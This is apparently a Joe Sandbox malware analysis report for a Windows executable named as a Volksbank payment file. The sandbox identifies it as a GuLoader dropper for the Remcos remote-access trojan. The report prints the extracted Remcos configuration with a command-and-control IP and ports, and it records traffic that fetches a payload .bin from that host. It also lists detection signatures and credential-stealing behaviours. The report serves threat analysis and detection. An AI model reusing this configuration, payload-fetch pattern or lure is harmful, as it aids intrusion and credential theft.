Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe

Overview

General Information

Sample name:Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
Analysis ID:1520599
MD5:97249feaaa2dd67af540e7615533294c
SHA1:dbfde83716b7253d7640d2ae3b45774337ce5931
SHA256:bd4499ee1845b2eeadc364b26f6e5891aaa699945a1125e6fcceedaac87f9090
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "102.165.14.28:26000:1102.165.14.28:27000:1102.165.14.28:28000:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0V7E34", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.7799903641.000000000416E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000001.00000002.7799903641.0000000004175000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000001.00000002.7792890064.00000000025B5000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000000.00000002.2950982254.00000000055B5000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 3 entries

            Sigma Signatures

            Stealing of Sensitive Information

            barindex
            Sigma detected: Remcos
            Source: Registry Key setAuthor: Joe Security: Data: Details: C1 3A FA F5 B6 00 28 79 DB B3 CE 24 8E 88 C9 AA 6E F4 34 42 F6 09 79 1F 6E 43 1E DD 9E 81 00 7E 43 39 10 9F 9E FC 59 27 F0 97 A0 E0 B7 89 78 10 3B 93 23 72 0F 76 E4 FD F7 24 57 48 E6 16 7B F4 B0 06 F7 BA BE CF A6 9D E0 FE 9E A9 07 E8 41 0C A9 96 53 1D 46 74 AA A1 A7 A7 39 82 7C C7 D1 54 59 57 2F 77 98 10 84 53 DD 9B C7 60 3D 75 2D D6 87 58 1B 84 3B DF D8 A7 97 EC 7F 38 55 37 70 B3 79 1E 49 D3 F1 D7 FB 90 9E 06 84 07 11 00 96 7C 27 59 75 10 1A 06 EC 89 99 1D CA 0F 02 26 E0 03 E0 05 C0 E2 , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, ProcessId: 5888, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-0V7E34\exepath

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-27T16:44:21.141834+020020365941Malware Command and Control Activity Detected192.168.11.2049736102.165.14.2826000TCP
            2024-09-27T16:44:22.344265+020020365941Malware Command and Control Activity Detected192.168.11.2049738102.165.14.2826000TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-27T16:44:22.336649+020028033043Unknown Traffic192.168.11.2049737178.237.33.5080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-27T16:44:19.723915+020028032702Potentially Bad Traffic192.168.11.2049735102.165.14.2880TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000001.00000002.7799903641.0000000004175000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "102.165.14.28:26000:1102.165.14.28:27000:1102.165.14.28:28000:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0V7E34", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
            Multi AV Scanner detection for submitted file
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeReversingLabs: Detection: 36%
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000001.00000002.7799903641.000000000416E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.7799903641.0000000004175000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe PID: 5888, type: MEMORYSTR
            Machine Learning detection for sample
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,2_2_00404423
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 0_2_0040596D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596D
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 0_2_004065A2 FindFirstFileW,FindClose,0_2_004065A2
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 1_2_34F410F1 LdrInitializeThunk,LdrInitializeThunk,lstrlenW,lstrlenW,lstrcatW,lstrlenW,LdrInitializeThunk,lstrlenW,LdrInitializeThunk,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,1_2_34F410F1
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 1_2_34F46580 LdrInitializeThunk,FindFirstFileExA,1_2_34F46580
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0040AE51 FindFirstFileW,FindNextFileW,2_2_0040AE51
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,3_2_00407EF8

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49736 -> 102.165.14.28:26000
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49738 -> 102.165.14.28:26000
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: 102.165.14.28
            Source: global trafficTCP traffic: 192.168.11.20:49736 -> 102.165.14.28:26000
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewASN Name: ASDETUKhttpwwwheficedcomGB ASDETUKhttpwwwheficedcomGB
            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.11.20:49737 -> 178.237.33.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49735 -> 102.165.14.28:80
            Source: global trafficHTTP traffic detected: GET /dYaWuYrfJW197.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 102.165.14.28Cache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: unknownTCP traffic detected without corresponding DNS query: 102.165.14.28
            Source: global trafficHTTP traffic detected: GET /dYaWuYrfJW197.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 102.165.14.28Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008590542.00000000023B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePre
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008590542.00000000023B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePre
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F10000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F10000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008749648.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3007602786.00000000023A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv'Kv'Kv'Kv'Kv'Kv'Kv'Kv'Kv'Kv'Kv equals www.facebook.com (Facebook)
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008749648.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3007602786.00000000023A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv!Tv'Kv'Kv'Kv'Kv'Kv'Kv'Kv'Kv'Kv'Kv equals www.yahoo.com (Yahoo)
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3009603810.00000000023A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: me":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povare
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3009603810.00000000023A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: me":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":